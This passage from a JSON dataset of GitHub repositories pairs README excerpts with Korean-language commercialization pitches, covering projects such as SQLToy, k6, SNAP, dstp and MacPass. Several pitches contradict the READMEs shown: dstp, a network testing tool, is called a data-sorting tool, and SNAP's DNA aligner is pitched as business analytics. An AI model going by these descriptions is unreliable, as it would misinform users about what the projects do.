넷플릭스·쿠팡 같은 대형 서비스들이 사용하는 핵심 기술을 배우고 적용할 수 있는 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 추천 엔진 서비스**\n- 온라인 쇼핑몰이나 음악 스트리밍 업체들이 고객에게 \"이 상품도 좋아하실 거예","readme_excerpt":"# 推荐系统论文、学习资料、业界分享\n动态更新工作中实现或者阅读过的推荐系统相关论文、学习资料和业界分享，作为自己工作的总结，也希望能为推荐系统相关行业的同学带来便利。\n所有资料均来自于互联网，如有侵权，请联系王喆。同时欢迎对推荐系统感兴趣的同学与我讨论相关问题，我的联系方式如下：\n* Email: wzhe06@gmail.com\n* LinkedIn: [王喆的LinkedIn](https://www.linkedin.com/in/zhe-wang-profile/)\n* 知乎私信: [王喆的知乎](https://www.zhihu.com/people/wang-zhe-58)\n\n**其他相关资源**\n* [计算广告相关论文和资源列表](https://github.com/wzhe06/Ad-papers) <br />\n* [张伟楠的RTB Papers列表](https://github.com/wnzhang/rtb-papers)<br />\n* [搜广推业界实践文章](https://github.com/Doragd/Algorithm-Practice-in-Industry) <br />\n* [Honglei Zhang的推荐系统论文列表](https://github.com/hongleizhang/RSPapers)\n\n\n## 目录\n\n### Retrieval and Rerank\n* [[Distillation] Distillation Based Multi-task Learning- A Candidate Generation Model for Improving Reading Duration](https://github.com/wzhe06/Reco-papers/blob/master/Retrieval%20and%20Rerank/%5BDistillation%5D%20Distillation%20Based%20Multi-task%20Learning-%20A%20Candidate%20Generation%20Model%20for%20Improving%20Reading%20Duration.pdf) <br />\n* [[PRM] Personalized Re-ranki","composite_score":0.178,"license_safety_tag":"safe"},{"name":"CESSProject/cess","github_url":"https://github.com/CESSProject/cess","stars":11,"language":"Rust","license":"Apache-2.0","abandonment_months":9,"description":"# CESS Project 분석\n\n## 왜 보물인가\n분산형 저장소 기술로 클라우드 업체에 의존하지 않고 데이터를 안전하게 보관할 수 있는 기반을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **기업 데이터 백업 서비스**: 중소 기업들이 자신의 중요 파일을 저렴하게 보관하는 클라우드 스토리지 SaaS\n2. **의료·법률 기록 관리 시스템**: 규제가 엄격한","readme_excerpt":"# ![CESS](https://github.com/CESSProject/doc-v2/blob/main/assets/introduction/banner.jpg)\n\n[![Substrate version](https://img.shields.io/badge/Substrate-3.0.0-blue?logo=Parity%20Substrate)](https://substrate.dev/) [![GitHub license](https://img.shields.io/badge/license-GPL3%2FApache2-blue)](#LICENSE)\n[![build-and-test](https://github.com/CESSProject/cess/actions/workflows/build-and-test.yml/badge.svg)](https://github.com/CESSProject/cess/actions/workflows/build-and-test.yml)\n\n\n<a href='https://web3.foundation/'><img width='205' alt='web3f_grants_badge.png' src='https://github.com/heyworld88/gitskills/blob/main/web3f_grants_badge.png'></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href='https://builders.parity.io/'><img width='240' src='https://github.com/CESSProject/cess/assets/15166250/76b74c48-a411-4ffa-b37c-d2bc27e526bf'></a>\n  \n**[CESS](http://cess.network/) is to provide the capabilities of a new global decentralized cloud data storage network by building with the infrastructure of decentral","composite_score":0.1778,"license_safety_tag":"safe"},{"name":"whittlem/pycryptobot","github_url":"https://github.com/whittlem/pycryptobot","stars":9,"language":"Python","license":"Apache-2.0","abandonment_months":2,"description":"# pycryptobot 상품화 분석\n\n## 왜 보물인가\n암호화폐 자동 거래를 누구나 쉽게 시작할 수 있도록 만든 도구로, 손으로 일일이 거래하지 않아도 컴퓨터가 자동으로 매매해주는 시스템입니다.\n\n## 어디에 쓸 수 있나\n\n1. **암호화폐 거래소 연동 SaaS**: 초보 투자자들이 월 구독료로 자동 거래 봇을 사용하는 웹 서비스\n2. **개인 투자자용 ","readme_excerpt":"# Python Crypto Bot v8.2.4 (pycryptobot)\n\n[![Docker](https://github.com/whittlem/pycryptobot/actions/workflows/container.yml/badge.svg)](https://github.com/whittlem/pycryptobot/actions/workflows/container.yml/badge.svg) [![Tests](https://github.com/whittlem/pycryptobot/actions/workflows/unit-tests.yml/badge.svg)](https://github.com/whittlem/pycryptobot/actions/workflows/unit-tests.yml/badge.svg)\n\n## Join our chat on Telegram\n\n<https://t.me/joinchat/09hYKfelbRY2MDNk>\n\nPlease beware of scammers impersonating the admins. Stay safe!\n\n1. Never share your API keys with anyone.\n2. Don't let anyone run your bots for you.\n3. The bot does not use a multi signature wallet.\n4. Telegram admins will never message you first.\n5. Chat in the main channel rather than privately.\n\n## Ask your questions and get support in the discussions\n\n<https://github.com/whittlem/pycryptobot/discussions>\n\n## Supporting The Project\n\nI get paid to write on Medium. Readers following me, applauding and commenting on my art","composite_score":0.1765,"license_safety_tag":"safe"},{"name":"amplab/snap","github_url":"https://github.com/amplab/snap","stars":23,"language":"C++","license":"apache-2.0","abandonment_months":9,"description":"# amplab/snap 상품화 분석\n\n## 왜 보물인가\n데이터 분석을 위한 빠르고 효율적인 처리 도구로, 복잡한 데이터 작업을 단순화해 시간을 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 분석 SaaS**: 중소 기업들이 자체 데이터를 빠르게 분석하고 인사이트를 얻을 수 있는 클라우드 서비스\n2. **기업 내부 도구**: 대기업의 마케","readme_excerpt":"# SNAP\n\nScalable Nucleotide Alignment Program - <https://www.microsoft.com/en-us/research/project/snap/>\n\n## Overview\n\nSNAP is a fast and accurate aligner for short DNA reads. It is optimized for\nmodern read lengths of 100 bases or higher, and takes advantage of these reads\nto align data quickly through a hash-based indexing scheme.\n\nIt also includes support for sorting, marking duplicates and indexing its results, eliminating the \nneed for several pipeline stages used by other aligners.\n\n## Binaries\n\nCurrent binaries are available on this GitHub page under \"releases\"\n\n\n## Documentation\n\nSNAP has a one page [Quick Start Guide](https://1drv.ms/b/s!AhuEg_0yZD86hcpcvhSwRyDwk1Ru0Q?e=4BvzLn) and a more extensive [Manual](https://1drv.ms/b/s!AhuEg_0yZD86hcpblUt-muHKYsG8fA?e=mbyUP5).\n\n## Building\n\nSNAP runs on Windows, Linux and OSX.\n\nFor Windows, we provide a Visual C++ solution, `snap.sln`. Requirements:\n- Visual Studio 2022\n\nWhen you build it, you will have to set it to build for x64, not ","composite_score":0.1756,"license_safety_tag":"safe"},{"name":"alibaba/BizCharts","github_url":"https://github.com/alibaba/BizCharts","stars":19,"language":"TypeScript","license":"unknown","abandonment_months":12,"description":"# BizCharts 저장소 분석\n\n## 왜 보물인가\n알리바바가 만든 비즈니스 차트 라이브러리로, 회사의 데이터를 쉽게 그래프와 표로 시각화할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 기업의 매출, 고객 현황 등을 자동으로 보여주는 대시보드 웹서비스\n2. **내부 업무 도구**: 대기업의 HR, 재무팀이 월간 보고","readme_excerpt":"# 通知\n亲爱的用户朋友们：  \n由于组织架构调整，BizCharts 将不再维护 官网站点数据库将于 6 月后下线。  \n所有文档资料现已完整迁移至本仓库的 docs 目录，欢迎查阅和使用。  \n感谢大家多年来的支持与陪伴！后续如需继续使用图表组件，推荐迁移至 AntV 生态。AntV API 与 BizCharts 同源，迁移成本低，且社区活跃。  \n如需迁移协助，DeepSeek 可为您提供智能迁移和答疑服务。如果您的项目仅需维护，无需新功能开发，也可直接通过 DeepSeek 获得技术支持。  \n再次感谢大家一路以来的信任与支持！  \n\n\n# BizCharts\n\n[![](https://img.shields.io/travis/alibaba/BiaCharts.svg)](https://travis-ci.com/alibaba/BizCharts)\n![](https://img.shields.io/badge/language-react-red.svg)  ![](https://img.shields.io/badge/license-MIT-000000.svg)  [![NPM Package](https://img.shields.io/npm/v/bizcharts.svg)](https://www.npmjs.com/package/bizcharts) [![NPM Downloads](https://img.shields.io/npm/dm/bizcharts.svg)](https://npmjs.org/package/bizcharts)\n\nNew charting and visualization library has been released: https://bizcharts.taobao.com/products/bizCharts.\n\n\n\n## Features\n- React ES6 grammar\n- Easy to use\n- Strong expansion capability\n- Support most data visualization charts\n\n[See more demos.](https://bizcharts.taobao.com/products/bizCha","composite_score":0.1748,"license_safety_tag":"unknown"},{"name":"weinberg/SQLToy","github_url":"https://github.com/weinberg/SQLToy","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":9,"description":"# SQLToy 프로젝트 분석\n\n## 왜 보물인가\n복잡한 데이터베이스 작업을 간단하게 만들어주는 도구로, 작은 회사부터 스타트업까지 개발 비용과 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 데이터 관리 클라우드 플랫폼에 내장하여 사용자가 직접 데이터를 다룰 수 있게 제공\n- **내부 업무 도구**: 중소기업의","readme_excerpt":"# What is SQLToy?\n\nSQLToy is an in-memory SQL database written in Javascript. It is under 500 lines of code and has zero dependencies. It supports the following SQL operations:\n\n    - SELECT\n    - FROM\n    - CROSS JOIN\n    - INNER JOIN\n    - LEFT JOIN\n    - RIGHT JOIN\n    - WHERE\n    - GROUP BY\n    - Aggregate functions: ARRAY_AGG, MAX, MIN, COUNT\n    - DISTINCT\n    - ORDER BY\n    - OFFSET\n    - LIMIT\n    - CREATE TABLE\n    - INSERT INTO\n    - UPDATE\n\nSQLToy is for learning SQL. Instead of doing this from the \"outside-in\" by learning the query language you do it \"inside-out\" by going through the implementation of the most common SQL operators. Instead of just learning what the operators do, you also learn how they do it which (hopefully!) gives you a much deeper level of understanding.\n\nA detailed [Wiki](https://github.com/weinberg/SQLToy/wiki) walks through the code. Please take a look!\n\nTo get the most out of this repository you should have familiarity with Javascript and some ES6 sy","composite_score":0.1747,"license_safety_tag":"safe"},{"name":"k6io/k6","github_url":"https://github.com/k6io/k6","stars":15,"language":"Go","license":"AGPL-3.0","abandonment_months":0,"description":"# k6io/k6 저장소 분석\n\n## 왜 보물인가\n웹사이트와 앱의 성능을 자동으로 테스트해주는 오픈소스 도구로, 기업들이 서비스 품질을 빠르게 검증할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 성능 모니터링 플랫폼**: 고객사의 웹 애플리케이션 성능을 지속적으로 체크하고 보고서를 제공하는 구독 서비스\n2. **기업 내부 품질관리 도구","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://grafana.com/oss/k6/\">\n    <picture>\n      <img src=\"assets/logo.svg\" alt=\"Grafana k6\" width=\"210\" height=\"210\" /><br>\n    </picture>\n    <br>\n    <picture>\n      <source media=\"(prefers-color-scheme: dark)\" srcset=\"assets/grafana-labs-dark-theme.svg\">\n      <source media=\"(prefers-color-scheme: light)\" srcset=\"assets/grafana-labs.svg\">\n      <img src=\"assets/grafana-labs.svg\" alt=\"Grafana Labs\" width=\"210\" />\n    </picture>\n    <br>\n  </a>\n</p>\n\n<h3 align=\"center\">Like unit testing, for performance</h3>\n<p align=\"center\">Modern load testing for developers and testers in the DevOps era.</p>\n\n<p align=\"center\">\n  <a href=\"https://github.com/grafana/k6/releases\"><img src=\"https://img.shields.io/github/release/grafana/k6.svg\" alt=\"Github release\"></a>\n  <a href=\"https://github.com/grafana/k6/actions/workflows/all.yml\"><img src=\"https://github.com/grafana/k6/actions/workflows/build.yml/badge.svg\" alt=\"Build status\"></a>\n  <a href=\"https://goreportcard.c","composite_score":0.174,"license_safety_tag":"risky"},{"name":"kentcdodds/dotfiles","github_url":"https://github.com/kentcdodds/dotfiles","stars":57,"language":"Shell","license":"unknown","abandonment_months":14,"description":"","readme_excerpt":"# dotfiles\n\nKent's Doddfiles... get it dot, dodd; yeah you get it.\n","composite_score":0.1737,"license_safety_tag":"unknown"},{"name":"mstarke/MacPass","github_url":"https://github.com/mstarke/MacPass","stars":5,"language":"Objective-C","license":"gpl-3.0","abandonment_months":13,"description":"# MacPass 상용화 분석\n\n## 왜 보물인가\nMac 사용자가 안전하게 비밀번호를 관리할 수 있는 무료 도구인데, 이를 프리미엄 기능으로 업그레이드하면 충분히 수익화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업용 비밀번호 관리 SaaS**: 중소기업의 팀 단위 비밀번호 공유 및 감시 기능을 추가한 구독 서비스\n2. **보안 컨설팅 패키지*","readme_excerpt":"[![Build Status](https://travis-ci.org/MacPass/MacPass.svg?branch=continuous)](https://travis-ci.org/MacPass/MacPass)\n\n# MacPass\n\nThere are a lot of iOS KeePass tools around but a distinct lack of a good native macOS version.\nKeePass can be used via Mono on macOS but lacks vital functionality and feels sluggish and simply out of place.\n\nMacPass is an attempt to create a native macOS port of KeePass on a solid open source foundation with a vibrant community pushing it further to become the best KeePass client for macOS.\n\n## Download\n\nAll pre-built releases can be found at [Github](https://github.com/MacPass/MacPass/releases).\n\nAn unsigned build of the current continuous tag can be found here: [Continuous Build](https://github.com/MacPass/MacPass/releases/tag/continuous)\n\nDue to the nature of the build it might be unstable, however this version contains all the latest changes and bug fixes!\n\n## How to Contribute\n\nIf you want to contribute by fixing a bug, adding a feature or improving lo","composite_score":0.1736,"license_safety_tag":"restricted"},{"name":"getinsomnia/insomnia","github_url":"https://github.com/getinsomnia/insomnia","stars":7,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# Insomnia 저장소 분석\n\n## 왜 보물인가\nAPI를 테스트하고 개발하는 개발자들을 위한 무료 도구로, 복잡한 웹 서비스 개발을 훨씬 쉽게 만들어주는 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n1. **API 테스트 SaaS 서비스**: 클라우드 기반 API 테스트 플랫폼으로 전환하여 여러 팀이 동시에 협업하는 유료 서비스 제공\n2. **기","readme_excerpt":"# Insomnia API Client\n\n[![Website](https://img.shields.io/badge/Get%20started%20for%20free-8A2BE2)](https://insomnia.rest)\n![Stars](https://img.shields.io/github/stars/Kong/insomnia?style=flat-square)\n![GitHub commit activity](https://img.shields.io/github/commit-activity/m/Kong/insomnia?style=flat-square)\n[![Slack Channel](https://chat.insomnia.rest/badge.svg)](https://chat.insomnia.rest/)\n[![license](https://img.shields.io/github/license/Kong/insomnia.svg)](LICENSE)\n![Twitter Follow](https://img.shields.io/twitter/follow/GetInsomnia?style=social)\n\nInsomnia is an open-source, cross-platform API client for GraphQL, REST, WebSockets, Server-Sent Events (SSE), gRPC and any other HTTP compatible protocol.\n\nWith Insomnia you can:\n\n- **Debug APIs** using the most popular protocols and formats.\n- **Design APIs** using the native OpenAPI editor and visual preview.\n- **Test APIs** using native test suites and collection runner.\n- **Mock APIs** using a cloud or self-hosted mocking server.\n- **B","composite_score":0.173,"license_safety_tag":"safe"},{"name":"tal-tech/go-zero","github_url":"https://github.com/tal-tech/go-zero","stars":23,"language":"Go","license":"MIT","abandonment_months":0,"description":"# go-zero 저장소 분석\n\n## 왜 보물인가\n작은 팀도 대규모 서비스를 빠르게 만들 수 있도록 도와주는 '개발 자동화 도구 모음'입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 초기 스타트업이 빠른 속도로 고객 관리, 결제, 데이터 처리 기능을 갖춘 웹 서비스 출시\n2. **내부 업무 도구**: 대기업의 인사팀이 직원 정보 관리, 휴","readme_excerpt":"# go-zero\n<p align=\"center\">\n<img align=\"center\" width=\"150px\" src=\"https://raw.githubusercontent.com/zeromicro/zero-doc/main/doc/images/go-zero.png\">\n</p>\n\ngo-zero is a web and rpc framework with lots of builtin engineering practices. It’s born to ensure the stability of the busy services with resilience design and has been serving sites with tens of millions of users for years.\n\n<div align=center>\n\n[![codecov](https://codecov.io/gh/zeromicro/go-zero/branch/master/graph/badge.svg)](https://codecov.io/gh/zeromicro/go-zero)\n[![Go Report Card](https://goreportcard.com/badge/github.com/zeromicro/go-zero)](https://goreportcard.com/report/github.com/zeromicro/go-zero)\n[![Release](https://img.shields.io/github/v/release/zeromicro/go-zero.svg?style=flat-square)](https://github.com/zeromicro/go-zero)\n[![Go Reference](https://pkg.go.dev/badge/github.com/zeromicro/go-zero.svg)](https://pkg.go.dev/github.com/zeromicro/go-zero)\n[![Awesome Go](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29","composite_score":0.1729,"license_safety_tag":"safe"},{"name":"NattyNarwhal/vmwmouse","github_url":"https://github.com/NattyNarwhal/vmwmouse","stars":17,"language":"Assembly","license":"unknown","abandonment_months":9,"description":"# vmwmouse 저장소 분석\n\n## 왜 보물인가\nVMware 가상머신 환경에서 마우스 동작을 개선하는 특수한 도구로, 특정 분야의 반복적인 기술 문제를 해결합니다.\n\n## 어디에 쓸 수 있나\n1. **IT 교육 플랫폼**: 가상머신 실습 환경에서 학생들의 마우스 조작 경험을 향상시키는 부가 기능으로 판매\n2. **기업용 원격 지원 솔루션**: 기술지원팀","readme_excerpt":"**IMPORTANT**: I haven't touched this driver in a while, and there are some\nissues with it. I'm happy people got a lot of use and enjoyment out of this\nquick weekend hack, but it needs some work I don't have time to give it.\n\nI would recommend using Javier Pedro's [VBADOS][5] mouse driver, which has\nhas the benefit of being a `mouse.com` that works with DOS applications, as\nwell as with both VirtualBox and VMware.\n\n# VMware mouse driver for Windows 3.x\n\nRunning Windows 3.1 in VMware, DOSBox-X, or QEMU, but annoyed by having to grab\nand ungrab the cursor manually?\n\nWish you could just move the cursor in and out like a modern OS (one with USB\ntablet support or VMware Tools drivers), with no Ctrl+Alt(+G) dancing?\n\nOr want to control your cursor *at all* under the ESXi web UI? (It doesn't do\nrelative input.)\n\nWith this driver, now you can. It implements the interface that VMware uses\n(the [backdoor][1]), replacing the existing PS/2 mouse driver.\n\nhttps://user-images.githubusercontent.com/3","composite_score":0.1728,"license_safety_tag":"unknown"},{"name":"thomaspark/bootswatch","github_url":"https://github.com/thomaspark/bootswatch","stars":6,"language":"JavaScript","license":"mit","abandonment_months":2,"description":"# Bootswatch 저장소 분석\n\n## 왜 보물인가\n웹사이트를 쉽게 예쁘게 꾸밀 수 있는 무료 디자인 테마 모음으로, 개발자가 아닌 일반인도 전문가 수준의 외관을 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 스타트업이 내부 관리자 페이지나 대시보드를 빠르게 구축할 때 활용\n2. **내부 업무 도구**: 회사의 보고서 ","readme_excerpt":"<p align=\"center\">\n  <img width=\"200\" height=\"200\" src=\"https://bootswatch.com/_assets/img/logo.png\">\n</p>\n\n<h3 align=\"center\">Bootswatch</h3>\n\n<p align=\"center\">\n  A collection of open source themes for <a href=\"https://getbootstrap.com/\">Bootstrap</a>\n  <br>\n  <a href=\"https://bootswatch.com/\"><strong>View Bootswatch themes »</strong></a>\n  <br>\n  <br>\n  <a href=\"https://github.com/thomaspark/bootswatch/issues/new\">Report bug</a>\n  ·\n  <a href=\"https://github.com/thomaspark/bootswatch/issues/new\">Request feature</a>\n  ·\n  <a href=\"https://blog.bootswatch.com/\">Blog</a>\n</p>\n\n## Usage\n\nThere are a few different ways you can integrate Bootswatch into your project.\n\n### Via Pre-compiled Asset\n\nDownload the `bootstrap.min.css` file associated with a theme and replace\nBootstrap's default stylesheet. You must still include Bootstrap's JavaScript\nfile to have functional dropdowns, modals, etc.\n\n### Via CDN\n\nYou can use the themes via CDN at [jsDelivr](https://www.jsdelivr.com/package/npm/bo","composite_score":0.1727,"license_safety_tag":"safe"},{"name":"GoogleChromeLabs/jsbi","github_url":"https://github.com/GoogleChromeLabs/jsbi","stars":6,"language":"JavaScript","license":"apache-2.0","abandonment_months":14,"description":"# GoogleChromeLabs/jsbi 분석 보고서\n\n## 왜 보물인가\n웹 브라우저에서 매우 큰 숫자를 정확하게 계산할 수 있게 해주는 도구로, 금융·암호화폐·과학 계산 분야에서 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **암호화폐 거래 플랫폼**: 비트코인 가격 계산, 지갑 잔액 표시 등에서 소수점 오류 없이 정확한 금액 처리\n2. **","readme_excerpt":"# JSBI — pure-JavaScript BigInts [![Build status](https://github.com/GoogleChromeLabs/jsbi/actions/workflows/main.yml/badge.svg)](https://github.com/GoogleChromeLabs/jsbi/actions/workflows/main.yml) [![jsbi on npm](https://img.shields.io/npm/v/jsbi)](https://www.npmjs.com/package/jsbi)\n\nJSBI is a pure-JavaScript implementation of [the ECMAScript BigInt proposal](https://tc39.es/proposal-bigint/), which officially became a part of the JavaScript language in ES2020.\n\n## Installation\n\n```sh\nnpm install jsbi --save\n```\n\n## Usage\n\n```js\nimport JSBI from './jsbi.mjs';\n\nconst max = JSBI.BigInt(Number.MAX_SAFE_INTEGER);\nconsole.log(String(max));\n// → '9007199254740991'\nconst other = JSBI.BigInt('2');\nconst result = JSBI.add(max, other);\nconsole.log(String(result));\n// → '9007199254740993'\n```\n\nNote: explicitly call `toString` on any `JSBI` instances when `console.log()`ing them to see their numeric representation (e.g. `String(max)` or `max.toString()`). Without it (e.g. `console.log(max)`), y","composite_score":0.1726,"license_safety_tag":"safe"},{"name":"bab2min/tomotopy","github_url":"https://github.com/bab2min/tomotopy","stars":8,"language":"C++","license":"MIT","abandonment_months":3,"description":"# bab2min/tomotopy 분석 보고서\n\n## 왜 보물인가\n텍스트에서 숨겨진 의미를 자동으로 찾아내는 AI 분석 도구로, 뉴스 기사, 고객 피드백, 소셜 미디어 등에서 주요 주제를 빠르게 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 고객 의견을 자동으로 분류하고 요약해주는 클라우드 분석 플랫폼\n- **내부 업무 ","readme_excerpt":"tomotopy\n========\n\n.. image:: https://badge.fury.io/py/tomotopy.svg\n    :target: https://pypi.python.org/pypi/tomotopy\n\n.. image:: https://zenodo.org/badge/186155463.svg\n   :target: https://zenodo.org/badge/latestdoi/186155463\n\n🌐\n**English**,\n`한국어`_.\n\n.. _한국어: README.kr.rst\n\nWhat is tomotopy?\n------------------\n\n`tomotopy` is a Python extension of `tomoto` (Topic Modeling Tool) which is a Gibbs-sampling based topic model library written in C++.\nIt utilizes a vectorization of modern CPUs for maximizing speed. \nThe current version of `tomoto` supports several major topic models including \n\n* Latent Dirichlet Allocation (`tomotopy.LDAModel`)\n* Labeled LDA (`tomotopy.LLDAModel`)\n* Partially Labeled LDA (`tomotopy.PLDAModel`)\n* Supervised LDA (`tomotopy.SLDAModel`)\n* Dirichlet Multinomial Regression (`tomotopy.DMRModel`)\n* Generalized Dirichlet Multinomial Regression (`tomotopy.GDMRModel`)\n* Hierarchical Dirichlet Process (`tomotopy.HDPModel`)\n* Hierarchical LDA (`tomotopy.HLDAModel`)\n* Mul","composite_score":0.1724,"license_safety_tag":"safe"},{"name":"linnovate/mean","github_url":"https://github.com/linnovate/mean","stars":6,"language":"TypeScript","license":"unknown","abandonment_months":3,"description":"# linnovate/mean 프로젝트 분석\n\n## 왜 보물인가\n웹사이트와 앱을 만드는 데 필요한 여러 기술을 한 번에 제공하는 통합 개발 플랫폼으로, 개발자가 처음부터 모든 것을 구축하지 않아도 된다는 점이 강점입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 회사 관리 도구, 프로젝트 관리 웹사이트처럼 구독으로 제공되는 클라우드 기반 ","readme_excerpt":"## Welcome to the mean stack\n\nThe mean stack is intended to provide a simple and fun starting point for cloud native fullstack javascript applications.  \nMEAN is a set of Open Source components that together, provide an end-to-end framework for building dynamic web applications; starting from the top (code running in the browser) to the bottom (database). The stack is made up of:\n\n- **M**ongoDB : Document database – used by your back-end application to store its data as JSON (JavaScript Object Notation) documents\n- **E**xpress (sometimes referred to as Express.js): Back-end web application framework running on top of Node.js\n- **A**ngular (formerly Angular.js): Front-end web app framework; runs your JavaScript code in the user's browser, allowing your application UI to be dynamic\n- **N**ode.js : JavaScript runtime environment – lets you implement your application back-end in JavaScript\n\n### Pre-requisites\n\n- git - [Installation guide](https://www.linode.com/docs/development/version-con","composite_score":0.1723,"license_safety_tag":"unknown"},{"name":"kitten/graphql-web-lite","github_url":"https://github.com/kitten/graphql-web-lite","stars":44,"language":"JavaScript","license":"MIT","abandonment_months":9,"description":"# GraphQL Web Lite 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터 조회 기능을 간단하게 만들 수 있는 경량 도구로, 웹 애플리케이션 개발 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 데이터 분석 플랫폼이나 대시보드 서비스에서 고객별로 필요한 정보만 빠르게 제공하는 API 구축\n- **내부 업무 도구*","readme_excerpt":"<div align=\"center\">\n  <h2 align=\"center\">graphql-web-lite</h2>\n  <p align=\"center\"><strong>The small sibling of the <code>graphql</code> package, slimmed down for client-side libraries</strong></p>\n  <br />\n  <a href=\"https://npmjs.com/package/graphql-web-lite\">\n    <img alt=\"NPM Version\" src=\"https://img.shields.io/npm/v/graphql-web-lite.svg\" />\n  </a>\n  <a href=\"https://npmjs.com/package/use-interactions\">\n    <img alt=\"License\" src=\"https://img.shields.io/npm/l/graphql-web-lite.svg\" />\n  </a>\n  <a href=\"https://bundlephobia.com/result?p=graphql-web-lite\">\n    <img alt=\"Minified gzip size\" src=\"https://img.shields.io/bundlephobia/minzip/graphql-web-lite.svg?label=gzip%20size\" />\n  </a>\n  <br />\n  <br />\n</div>\n\nThe `graphql` package serves two purposes in being the reference implementation of the\n[GraphQL specification](https://spec.graphql.org/) and being used as the shared toolkit\nfor implementing GraphQL in client-side and server-side JavaScript applications. This\ncan cause bloat","composite_score":0.1722,"license_safety_tag":"safe"},{"name":"ycd/dstp","github_url":"https://github.com/ycd/dstp","stars":11,"language":"Go","license":"MIT","abandonment_months":9,"description":"# ycd/dstp 상용화 분석\n\n## 왜 보물인가\n데이터를 정렬하고 처리하는 작업을 자동으로 해주는 도구로, 반복적인 데이터 정리 업무에서 인력과 시간을 크게 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 엑셀 파일이나 CSV 데이터를 자동 정렬·정제해주는 웹 기반 서비스로 중소기업 사무직 직원들에게 판매\n- **내부 업무 ","readme_excerpt":"<div align=\"center\">\n<h1>dstp</h1>\n\n[dstp](https://github.com/ycd/dstp), run common networking tests against your site.\n\n![dstp gif](assets/dstp.png)\n\n</div>\n\n\n---\n\n## Usage\n\n```\nUsage: dstp [OPTIONS] [ARGS]\nOptions:\n        -a, --addr   <string>  The URL or the IP address to run tests against      [REQUIRED]\n        -o, --out    <string>  The type of the output, either json or plaintext    [Default: plaintext] \n        -p           <int>     Number of ping packets                              [Default: 3]\n        -t           <int>     Give up on ping after this many seconds             [Default: 2s per ping packet]\n        --port       <string>  Port for testing TLS and HTTPS connectivity         [Default: 443]\n        --dns        <string>  Custom DNS server to use for DNS resolution         [No default]\n        -h, --help             Show this message and exit.\n```\n\n## Motivation\n\nA comment on [lobste.rs](https://lobste.rs/s/qtsklv/how_do_you_tell_if_problem_is_caused_by_dns#c_1nqk","composite_score":0.1721,"license_safety_tag":"safe"},{"name":"you-dont-need/You-Dont-Need-JavaScript","github_url":"https://github.com/you-dont-need/You-Dont-Need-JavaScript","stars":19,"language":"HTML","license":"GPL-3.0","abandonment_months":6,"description":"# You-Dont-Need-JavaScript 보물 분석\n\n## 왜 보물인가\n웹사이트를 꾸밀 때 복잡한 프로그래밍 없이 기본 기능들을 간단하게 구현할 수 있는 방법들을 모아놓은 교과서 같은 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 저코드·노코드 웹빌더 플랫폼에서 사용자들에게 \"프로그래밍 없이 만드는 법\" 튜토리얼 제공\n2. ","readme_excerpt":"English | [简体中文](./README-zh_CN.md)\n\n# You Don't Need JavaScript\n\n[![Join the community on Spectrum](https://withspectrum.github.io/badge/badge.svg)](https://dev.to/t/javascript)\n\nPlease be aware that the demos may exhibit significant accessibility issues, such as problems with keyboard navigation, speech synthesis, and progressive enhancement or degradation.\n\n### Style Guide:\n\n```markdown\n## <a id=\"DemoSubject\"></a>Carousel\n\n[<img src=\"images/image1.png\" height=\"230\" title=\"Demo 1\">](http://url-to-page)\n[<img src=\"images/image2.png\" height=\"230\" title=\"Demo 2\">](http://url-to-page)\n[<img src=\"images/image3.png\" height=\"230\" title=\"Demo 3\">](http://url-to-page)\n\n**[⬆ back to top](#quick-links)**\n```\n\n---\n\n## Quick Links\n\n- [You Don't Need JavaScript](#you-dont-need-javascript)\n- [Website Demo Using HTML CSS](#website-demo)\n- [Style Guide](#style-guide)\n- [Accordion / Toggle](#accordion--toggle)\n- [Analog Clock](#analog-clock)\n- [Animated Button](#animated-button)\n- [Animated Buttons](#","composite_score":0.1719,"license_safety_tag":"restricted"},{"name":"notifirehq/notifire","github_url":"https://github.com/notifirehq/notifire","stars":14,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"# Notifire 저장소 분석\n\n## 왜 보물인가\n복잡한 알림 시스템을 쉽게 관리할 수 있는 통합 플랫폼으로, 이메일·SMS·푸시 알림을 한 곳에서 제어할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객에게 주문 확인·배송 알림·구독 갱신 알림 등을 자동으로 전송하는 알림 기능\n2. **내부 업무 도구**: 팀원들에게 중요한 ","readme_excerpt":"<div align=\"center\">\n  <a href=\"https://go.novu.co/github?utm_campaign=readme-logo\" target=\"_blank\" rel=\"noopener noreferrer\"\n>\n  <picture>\n    <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://user-images.githubusercontent.com/2233092/213641039-220ac15f-f367-4d13-9eaf-56e79433b8c1.png\">\n    <img alt=\"Novu Logo\" src=\"https://user-images.githubusercontent.com/2233092/213641043-3bbb3f21-3c53-4e67-afe5-755aeb222159.png\" width=\"280\"/>\n  </picture>\n  </a>\n</div>\n\n<br/>\n<p align=\"center\">\n  <a href=\"https://www.producthunt.com/products/novu\" target=\"_blank\" rel=\"noopener noreferrer\"\n>\n    <img 